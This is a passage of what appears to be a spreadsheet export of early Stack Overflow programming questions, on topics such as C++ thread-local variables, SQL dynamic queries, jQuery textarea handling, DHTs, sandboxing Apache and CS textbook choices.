&lt;p&gt;To that end, I've purchased and started reading a few academic textbooks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0262011530" rel="nofollow"&gt;Structure and Interpretation of Computer Programs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0262032937" rel="nofollow"&gt;Introduction to Algorithms&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0137903952" rel="nofollow"&gt;Artificial Intelligence: A Modern Approach&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As well as a few textbooks I have left over from classes I've taken at a mediocre-at-best state university:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0805377581" rel="nofollow"&gt;An Introduction to Computer Simulation Methods&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/007330929X" rel="nofollow"&gt;Calculus: Concepts and Connections&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0131856448" rel="nofollow"&gt;Computer Organization and Architecture&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0471694665" rel="nofollow"&gt;Operating System Concepts&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/013600637X" rel="nofollow"&gt;A First Course in Database Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rads.stackoverflow.com/amzn/click/0763737984" rel="nofollow"&gt;Formal Languages and Automata&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My questions are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What topics aren't covered by this collection?&lt;/li&gt;
&lt;li&gt;Are there any books that are more rigorous or thorough (or even easier to read) than a book listed here?&lt;/li&gt;
&lt;li&gt;Are there any books that are a waste of my time?&lt;/li&gt;
&lt;li&gt;In what order should I read the books?&lt;/li&gt;
&lt;li&gt;What does an MIT or Stanford (or UCB or CMU ...) undergrad learn that I might miss?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Software engineering books are welcome, but in the context of academic study only please. I'm aware of Code Complete and the Pragmatic Programmer, but I'm looking for a more theoretical approach. Thanks!&lt;/em&gt; &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does Multiple C++ Threads execute on a class method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;let's say we have a c++ class like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MyClass
{
   void processArray( &amp;lt;an array of 255 integers&amp;gt; )
   {
     int i ;
     for (i=0;i&amp;lt;255;i++)
     {
        // do something with values in the array
     }
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and one instance of the class like:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyClass myInstance ;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and 2 threads which call the processArray method of that instance (depending on how system executes threads, probably in a completely irregular order). There is no mutex lock used in that scope so both threads can enter.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My question is what happens to the i ? Does each thread scope has it's own "i" or would each entering thread modify i in the for loop, causing i to be changing weirdly all the time.&lt;/strong&gt; &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database Design</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a database to store simulation results.  What resources are out there to help me design this?&lt;/p&gt;
&lt;p&gt;EDIT: For those who want more details...&lt;/p&gt;
&lt;p&gt;We work with a discrete event simulation used by the military.  Important simulation events are thus when weapons are fired, when kills occur, and also when weapons fail to kill a target.  Other important events are when targets are detected or when they are no longer tracked.  We keep pretty detailed log files that we then mine to calculate averages and other statistics.  It's mainly the statistics that I'm concerned with storing in the database.  &lt;/p&gt;
&lt;p&gt;Another thing I want to include is the case ID.  We identify different cases using an alphanumeric case ID string that corresponds to a particular combination of systems and important input parameters.  For example, suppose a sensor could detect a target at 3 different ranges depending on mode, there would be a character in the case ID that corresponds to each level of detection range, labeled 0, 1, or 2.  If there are enough levels of a given case, the case ID characters switch to letters after 9.  This case ID would definitely be an important key in the database.  Once we have stored the data, we need to retrieve certain numbers to make charts comparing different cases.  We currently make the charts in Excel, but I've been adding more MATLAB recently.&lt;/p&gt;
&lt;p&gt;As for the database technology, I thought I'd do the table design in Access to prototype things, then implement it in MS SQL Server.  I'm planning to use Ruby to create HTML reports with data tables and graphs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I deploy an ADF business component?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I deploy an ADF business component to the middle tier and call it using &lt;a href="http://en.wikipedia.org/wiki/Java_remote_method_invocation" rel="nofollow"&gt;RMI&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;I just cannot find any good documentation on this!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I be sure the whole MySQL DB is loaded in memory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am running a mysql server. I would like to somehow make sure that the whole DB is loaded into the ram as I heard it would be alot faster.&lt;/p&gt;
&lt;p&gt;Is this true? and how do I vertify it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the RGB values for a pixel on an image on the iphone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing an iPhone application and need to essentially implement something equivalent to the 'eyedropper' tool in photoshop, where you can touch a point on the image and capture the RGB values for the pixel in question to determine and match its color.  Getting the UIImage is the easy part, but is there a way to convert the UIImage data into a bitmap representation in which I could extract this information for a given pixel?  A working code sample would be most appreciated, and note that I am not concerned with the alpha value.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple basic explanation of a Distributed Hash Table (DHT)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could any one give an explanation on how a DHT works?&lt;/p&gt;
&lt;p&gt;Nothing too heavy, just the basics.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby: How to break a potentially unicode string into bytes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a game which is taking user input and rendering it on-screen.  The engine I'm using for this is entirely unicode-friendly, so I'd like to keep that if at all possible.  The problem is that the rendering loop looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"string".each_byte do |c|
    render_this_letter(c)
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't know a whole lot about i18n, but I know enough to know the above code is only ever going to work for me and people who speak my language.  I'd prefer something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"unicode string".each_unicode_letter do |u|
    render_unicode_letter(u)
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does this exist in the core distribution?  I'm somewhat averse to adding additional requirements to the install, but if it's the only way to do it, I'll live.&lt;/p&gt;
&lt;p&gt;For extra fun, I have no way of knowing if the string is, in fact, a unicode string.&lt;/p&gt;
&lt;p&gt;EDIT: The library I'm using can indeed render entire strings, however I'm letting the user edit what comes up on the fly - if they hit 'backspace', essentially, I need to know how many bytes to chop off the end.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>== or .Equals()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why use one over the other?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server: Dynamic where-clause</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Ajax suggest-search on [&lt;em&gt;n&lt;/em&gt;] ingredients in recipes. That is: match recipes against multiple ingredients.&lt;/p&gt;
&lt;p&gt;For instance: &lt;code&gt;SELECT Recipes using "flower", "salt"&lt;/code&gt; would produce: &lt;code&gt;"Pizza", "Bread", "Saltwater"&lt;/code&gt; and so forth.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tables:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Ingredients [
    IngredientsID INT [PK],
    IngredientsName VARCHAR
]
Recipes [
    RecipesID INT [PK],
    RecipesName VARCHAR
]
IngredientsRecipes [
    IngredientsRecipesID INT [PK],
    IngredientsID INT,
    RecipesID INT
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Query:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT
    Recipes.RecipesID,
    Recipes.RecipesName,
    Ingredients.IngredientsID,
    Ingredients.IngredientsName
FROM
    IngredientsRecipes
    INNER JOIN Ingredients
    ON IngredientsRecipes.IngredientsID = Ingredients.IngredientsID
    INNER JOIN Recipes
    ON IngredientsRecipes.RecipesID = Recipes.RecipesID
WHERE
    Ingredients.IngredientsName IN ('salt', 'water', 'flower')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am currently constructing my query using ASP.NET C# because of the dynamic nature of the &lt;code&gt;WHERE&lt;/code&gt; clause.&lt;/p&gt;
&lt;p&gt;I bites that I have to construct the query in my code-layer instead of using a stored procedure/pure SQL, which in theory should be much faster.&lt;/p&gt;
&lt;p&gt;Have you guys got any thoughts on how I would move all of the logic from my code-layer to pure SQL, or at least how I can optimize the performance of what I'm doing?&lt;/p&gt;
&lt;p&gt;I am thinking along the lines of temporary tables:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step one&lt;/strong&gt;: &lt;code&gt;SELECT IngredientsID FROM Ingredients&lt;/code&gt; and &lt;code&gt;INSERT INTO temp-table&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step two&lt;/strong&gt;: &lt;code&gt;SELECT RecipesName FROM Recipes&lt;/code&gt; joined with &lt;code&gt;IngredientsRecipes&lt;/code&gt; joined with &lt;code&gt;temp-table.IngredientsID&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specifying the type of ArrayList's elements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought that there was some way in .net 3.0 to give an array list a type so that it didnt just return Object's but I'm having trouble doing so. Is it possible? If so, how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Robust and easy to implement serial bus (automotive application)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What serial communication bus would you use in a automotive embedded system if your main selection criteria were:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Electrically robust  &lt;/li&gt;
&lt;li&gt;Slow speed (32 kb/s)  &lt;/li&gt;
&lt;li&gt;Easy to program  &lt;/li&gt;
&lt;li&gt;Easy to interface with microcontrollers  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It won't be transferring much data, but it will need to be transferred periodically at high speed (100 - 500 Hz). I find that RS-232 is just not reliable enough if you have noise in your ground line. CAN-bus seems interesting, but I have no experience with it. &lt;/p&gt;
&lt;p&gt;We are currently interested in a combination of AVR AT90CAN128 microcontrollers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I allow a user to use their own domain name for a hosted service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on an ASP.NET MVC web app that allows people to publish content, but other than publish the content to a remote server, I want to allow people to use their domain name directly.  For example, the user "Tom" can have his domain name TomSite.com point to &lt;a href="http://www.mywebapp.com/user/tom" rel="nofollow"&gt;http://www.mywebapp.com/user/tom&lt;/a&gt;, but the sub path will also be mapped. For example, TomSite.com/path will be mapped to www.mywebapp.com/user/tom/path, and this is transparent to the web visitor. The visitor will never see "mywebapp.com" anywhere on TomSite.com.&lt;/p&gt;
&lt;p&gt;I think Smugmug.com provides such service, to allow people to use their own domain name for the photo portfolio. I want to achieve the same result.&lt;/p&gt;
&lt;p&gt;How can I do this? Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Teaching: Field, Class &amp; Package Relationships</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In general I think I can convey most programming related concepts quite well.&lt;br /&gt;
Yet, I still find it hard to summarise the relationship between Fields, Classes and Packages.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;
&lt;strong&gt;How do You summarise "Fields", "Classes" and "Packages" and "Their Relationship" ?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Things to consider when writing for touch screen?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting a new project which involves developing an interface for a machine that measures wedge and roundness of lenses and stores the information in a database and reports on it. There's a decent chance we're going to be putting a touch screen on this machine so that it doesn't need to have a mouse or keyboard... &lt;/p&gt;
&lt;p&gt;I don't have any experience developing for full size touch screens, so I'm looking for advice/tips/info from you guys...&lt;/p&gt;
&lt;p&gt;I can imagine you want to make the elements a little larger than normal... space buttons out a bit more.... things like that... anyone have anything else to add?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery get textarea text</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I have started playing with jQuery, and have been following a couple of tutorials. Now I feel slightly competent with using it (it's pretty easy), and I thought it would be cool if I were able to make a 'console' on my webpage (as in, you press the ` key like you do in &lt;a href="http://en.wiktionary.org/wiki/first-person_shooter"&gt;FPS&lt;/a&gt; games, etc.), and then have it Ajax itself back to the server in-order to do stuff.&lt;/p&gt;
&lt;p&gt;I originally thought the best way would be to just get the text inside the textarea, and then split it, or should I use the keyup event, convert the keycode returned to an ASCII character, append the character to a string and send the string to the server (then empty the string).&lt;/p&gt;
&lt;p&gt;I couldn't find any information on getting text from a textarea, all I got was keyup information. Also, how can I convert the keycode returned to an ASCII character?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to judge the strength of a directed acyclic graph?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Curious what is recognized as a solid algorithm/approach for judging the strength of a directed acyclic graph - particularly the strength of certain nodes.  The main question I have about this can be boiled down to the following two graphs:&lt;/p&gt;
&lt;p&gt; (if graph doesn't show up, click here or visit this link: &lt;a href="http://www.flickr.com/photos/86396568@N00/2893003041/" rel="nofollow"&gt;http://www.flickr.com/photos/86396568@N00/2893003041/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;To my eyes, A is in a stronger position than a.  I am judging strength by how strong a node can remain if a link is knocked out.  I'd call the first a thin "stilt", and the second a thick "stalk".&lt;/p&gt;
&lt;p&gt;Here are the approaches I've considered so far for judging the strength of a node:&lt;/p&gt;
&lt;p&gt;1) Counting the number of nodes below, subtracting the number of nodes above.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A=7, a=7, B=5, b=1&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;2) Counting the number of complete paths (to termination) for each node, summing their lengths.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A=17 (1+5+5+5+1), B=12 (4+4+4), a=9 (3+3+3), b=2&lt;/li&gt;
&lt;li&gt;This make the stilt stronger, rather than the stalk.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;3) Counting every possible path, treating every node as a destination.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A=9 (A-&gt;B, A-&gt;C, A-&gt;D, A-&gt;E, A-&gt;G, 2xA-&gt;F, 2xA-&gt;H), B=6, a=9, b=2&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;3 seems like the best option so far, but is there one that is better, generalized for DAGs?  Is this something that has a known best approach?  The principles are to use as much information in the graph as possible, and for the solution to be explainable in an intuitive way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I get the current page sourcecode from a firefox extension?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can this be done? How?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I want to write my own extension. Can Get the current page sorcecode in my own extension?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementing multithreading in C# (code review)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings.&lt;/p&gt;
&lt;p&gt;I'm trying to implement some multithreaded code in an application. The purpose of this code is to validate items that the database gives it. Validation can take quite a while (a few hundred ms to a few seconds), so this process needs to be forked off into its own thread for each item.&lt;/p&gt;
&lt;p&gt;The database may give it 20 or 30 items a second in the beginning, but that begins to decline rapidly, eventually reaching about 65K items over 24 hours, at which point the application exits.&lt;/p&gt;
&lt;p&gt;I'd like it if anyone more knowledgeable could take a peek at my code and see if there's any obvious problems. No one I work with knows multithreading, so I'm really just on my own, on this one.&lt;/p&gt;
&lt;p&gt;Here's the code. It's kinda long but should be pretty clear. Let me know if you have any feedback or advice. Thanks!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ItemValidationService
{
    /// &amp;lt;summary&amp;gt;
    /// The object to lock on in this class, for multithreading purposes.
    /// &amp;lt;/summary&amp;gt;
    private static object locker = new object();
    /// &amp;lt;summary&amp;gt;Items that have been validated.&amp;lt;/summary&amp;gt;
    private HashSet&amp;lt;int&amp;gt; validatedItems;
    /// &amp;lt;summary&amp;gt;Items that are currently being validated.&amp;lt;/summary&amp;gt;
    private HashSet&amp;lt;int&amp;gt; validatingItems;
    /// &amp;lt;summary&amp;gt;Remove an item from the index if its links are bad.&amp;lt;/summary&amp;gt;
    /// &amp;lt;param name="id"&amp;gt;The ID of the item.&amp;lt;/param&amp;gt;
    public void ValidateItem(int id)
    {
        lock (locker)
        {
            if
            (
                !this.validatedItems.Contains(id) &amp;amp;&amp;amp;
                !this.validatingItems.Contains(id)
            ){
                ThreadPool.QueueUserWorkItem(sender =&amp;gt;
                {
                    this.Validate(id);
                });
            }
        }
    } // method
    private void Validate(int itemId)
    {
        lock (locker)
        {
            this.validatingItems.Add(itemId);
        }
        // *********************************************
        // Time-consuming routine to validate an item...
        // *********************************************
        lock (locker)
        {
            this.validatingItems.Remove(itemId);
            this.validatedItems.Add(itemId);
        }
    } // method
} // class
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's the future of the web? XHTML 2, HTML 5, or something else?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm confused by the discussion and advancement both of a new version of HTML and a new version of XHTML. Are they competitors? If so, what is likeliest to be the adopted future of the web? If not, what is the differing non-competing purpose for each?&lt;/p&gt;
&lt;p&gt;Are we due to have a BluRay/HDVD battle here? Is there ultimately any clear decision? I fear a future where browsers pick and choose among the easiest and/or flashiest features of each to implement, leaving web developers trying to sort out the lowest common denominator for any new web app.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Distributing iPhone applications 2.1 vs 2.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can iPhone applications compiled against 2.1 be successfully installed via iTunes on a 2.0 device?&lt;/p&gt;
&lt;p&gt;I know iPhone applications compiled with 2.1 can &lt;em&gt;run&lt;/em&gt; on a 2.0 device (assuming they're not using anything new from 2.1). But am not sure if iTunes will let the install take place.&lt;/p&gt;
&lt;p&gt;Does anyone have concrete information on this?&lt;/p&gt;
&lt;p&gt;I have not seen any apps on the AppStore that are 2.1+ only.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ performance vs. Java/C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My understanding is that C/C++ produces native code to run on a particular machine architecture.  Conversely, languages like Java and C# run on top of a virtual machine which abstracts away the native architecture.  Logically it would seem impossible for Java or C# to match the speed of C++ because of this intermediate step, however I've been told that the latest compilers ("hot spot") can attain this speed or even exceed it.&lt;/p&gt;
&lt;p&gt;Perhaps this is more of a compiler question than a language question, but can anyone explain in plain English how it is possible for one of these virtual machine languages to perform better than a native language?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm to estimate number of English translation words from Japanese source</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to come up with a way to estimate the number of English words a translation from Japanese will turn into. Japanese has three main scripts -- &lt;a href="http://en.wikipedia.org/wiki/Kanji" rel="nofollow"&gt;Kanji&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Hiragana" rel="nofollow"&gt;Hiragana&lt;/a&gt;, and &lt;a href="http://en.wikipedia.org/wiki/Katakana" rel="nofollow"&gt;Katakana&lt;/a&gt; -- and each has a different average character-to-word ratio (Kanji being the lowest, Katakana the highest).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Examples:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;computer: ã‚³ãƒ³ãƒ”ãƒ¥ãƒ¼ã‚¿ (Katakana - 6
characters); è¨ˆç®—æ©Ÿ (Kanji: 3
characters)&lt;/li&gt;
&lt;li&gt;whale: ãã˜ã‚‰ (Hiragana --
3 characters); é¯¨ (Kanji: 1
character)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As data, I have a large glossary of Japanese words and their English translations, and a fairly large corpus of matched Japanese source documents and their English translations. I want to come up with a formula that will count numbers of Kanji, Hiragana, and Katakana characters in a source text, and estimate the number of English words this is likely to turn into.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling C/C++ from python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be the quickest way to construct a python binding to a C or C++ library?&lt;/p&gt;
&lt;p&gt;(using windows if this matters)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wide exec for C/C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a &lt;code&gt;wchar_t&lt;/code&gt; version of &lt;code&gt;exec[lv][pe]&lt;/code&gt; (i.e. an &lt;code&gt;exec&lt;/code&gt; that uses &lt;code&gt;wchar_t&lt;/code&gt; as path and &lt;code&gt;wchar_t&lt;/code&gt; as arguments)?
In &lt;code&gt;Windows&lt;/code&gt;, I can just do &lt;code&gt;CreateProcessW(process, cmdline)&lt;/code&gt;, but in &lt;code&gt;*nix&lt;/code&gt;, I'm stuck (i.e. no pure &lt;code&gt;POSIX&lt;/code&gt; equivalent).
I'm trying to add &lt;code&gt;UTF-16&lt;/code&gt; support to my program (an autorun).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I dictate the destination folder of a clickOnce application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I dictate the destination folder of a clickOnce application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any performance difference in using .resx file and satellite assembly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which is the best way to go forward while building a localized aspx web application, .resx files of satellite assemblies? Is there any performance comparisons available any where on web?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deploy a Desktop Shortcut to a Device running Windows CE 4.2 (VS2005)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application written using VS2005 in C# targeting the Compact Framework 2.0 SP2. As part of the solution, I have CAB deploy project which deploys to the device without a problem. What I can't do is create a shortcut to my application on the devices desktop.&lt;/p&gt;
&lt;p&gt;I have spent several hours reading various bits of documentation (why is the search at the MSDN site so bad?), followed the instructions but no joy. &lt;/p&gt;
&lt;p&gt;What I've done is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Add the "Windows Folder" node to the File System&lt;/li&gt;
&lt;li&gt;Created a folder underneath that named "Desktop"&lt;/li&gt;
&lt;li&gt;Created a shortcut to the Applications Primary Output and placed that in the "Desktop" folder&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why Stackoverflow binds user actions dynamically with javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Checking the HTML source of a question I see for instance:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a id="comments-link-xxxxx" class="comments-link"&amp;gt;add comment&amp;lt;/a&amp;gt;&amp;lt;noscript&amp;gt;&amp;amp;nbsp;JavaScript is needed to access comments.&amp;lt;/noscript&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then in the javascript source:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Setup our click events..
$().ready(function() {    
        $("a[id^='comments-link-']").click(function() { comments.show($(this).attr("id").substr("comments-link-".length)); });    
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems that all the user click events are binded this way.&lt;/p&gt;
&lt;p&gt;The downsides of this approach are obvious for people browsing the site with no javascript but, what are the advantages of adding events dynamically whith javascript over declaring them directly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to sandbox Apache on Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have Apache running on a public-facing Debian server, and am a bit worried about the security of the installation. This is a machine that hosts several free-time hobby projects, so none of us who use the machine really have the time to constantly watch for upstream patches, stay aware of security issues, etc. But I would like to keep the bad guys out, or if they get in, keep them in a sandbox.&lt;/p&gt;
&lt;p&gt;So what's the best, easy to set up, easy to maintain solution here? Is it easy to set up a user-mode linux sandbox on Debian? Or maybe a chroot jail? I'd like to have easy access to files inside the sadbox from the outside. This is one of those times where it becomes very clear to me that I'm a programmer, not a sysadmin. Any help would be much appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Existing Standard Style and Coding standard documents </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following have been proposed for an upcoming C++ project.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;C++ Coding Standards, by Sutter and Alexandrescu&lt;/li&gt;
&lt;li&gt;JSF Air Vehicle C++ coding standards&lt;/li&gt;
&lt;li&gt;The Elements of C++ Style&lt;/li&gt;
&lt;li&gt;Effective C++ 3rd Edition, by Scott Meyers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Are there other choices?  Or is the list above what be should used on a C++ project?&lt;/p&gt;
&lt;p&gt;Some related links&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/145508/do-you-think-a-software-company-should-impose-developers-a-coding-style"&gt;http://stackoverflow.com/questions/145508/do-you-think-a-software-company-should-impose-developers-a-coding-style&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/66268/what-is-the-best-cc-coding-style-closed"&gt;http://stackoverflow.com/questions/66268/what-is-the-best-cc-coding-style-closed&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What techniques do you use to maximise code reuse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some years ago I was told about a study into code reuse. Apparently it was found that, on average, programmers have a 7 minute window when searching for code to reuse. If they don't find code that suits their needs within that window they'll write their own.&lt;/p&gt;
&lt;p&gt;This was presented in the context of needing to carefully manage your code for reuse to ensure that you can find what you need within the window.&lt;/p&gt;
&lt;p&gt;How do you (individuals and organisations) manage your source to make it easier to reuse?
Do you specifically maintain a reuse library? And if so, how do you index it to maximise your hit rate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox Sidebar and Document object of DOM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a webpage loaded in the firefox sidebar and another webpage loaded in the main document. Now, how do I ask access the main document object through the Firefox sidebar? An example to do this through Javascript code in the firefox sidebar document to access the main document would be helpful.&lt;/p&gt;
&lt;p&gt;Thanks for the answers. I have to refine my question however. The main window has some webpage loaded and the sidebar has a webpage. I want the sidebar window to know what text the user has selected on the main window when a link on the sidebar window is clicked. I know how to get the selected text from a window. Only that the sidebar element adds complexity to the problem that I am not able to surpass.&lt;/p&gt;
&lt;p&gt;@PConory:&lt;/p&gt;
&lt;p&gt;I like your answer, but when I try it there is an error:
Error: Permission denied to create wrapper for object of class UnnamedClass.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Favorite image file format for 2d sprites</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is your favorite, lossless image format for games (namely 2d games)? And why?&lt;/p&gt;
&lt;p&gt;Some things to take into consideration are size on disk, overhead for converting to a usable format, and features of the format (ie alpha support).&lt;/p&gt;
&lt;p&gt;There is no best answer, but be sure to back yours up the best you can!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a stack trace in OCaml?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Objective Caml language will only produce stack traces if you ask for them just right - what are the requirements for both bytecode and native code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I determine that Windows Installer is performing an upgrade rather than a first time install?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an install that upgrades a previous version of an app if it exits. I'd like to skip certain actions when the install is upgrade mode. How can I determine if the install is running in upgrade mode vs. first time install mode?&lt;/p&gt;
&lt;p&gt;I'm using Wise Installer, but I don't think that matters. I'm assuming that Windows Installer has a property that is set when the installer is in upgrade mode. I just can't seem to find it. If the property exists, I'm assuming I could use it in a conditional statement.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Making Eclipse behave like Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing some Android dev, and I much prefer Visual Studio, but I'll have to use &lt;em&gt;Eclipse&lt;/em&gt; for this.&lt;/p&gt;
&lt;p&gt;Has anyone made a tool that switches &lt;em&gt;Eclipse&lt;/em&gt; to look and behave more like visual studio? I mainly can't stand its &lt;strong&gt;clippyesqe&lt;/strong&gt; suggestions on how I should program (Yes, I know I have not yet used that private field! Thanks Eclipse!), or its incredibly lousy &lt;strong&gt;intellisense&lt;/strong&gt;.&lt;/p&gt;
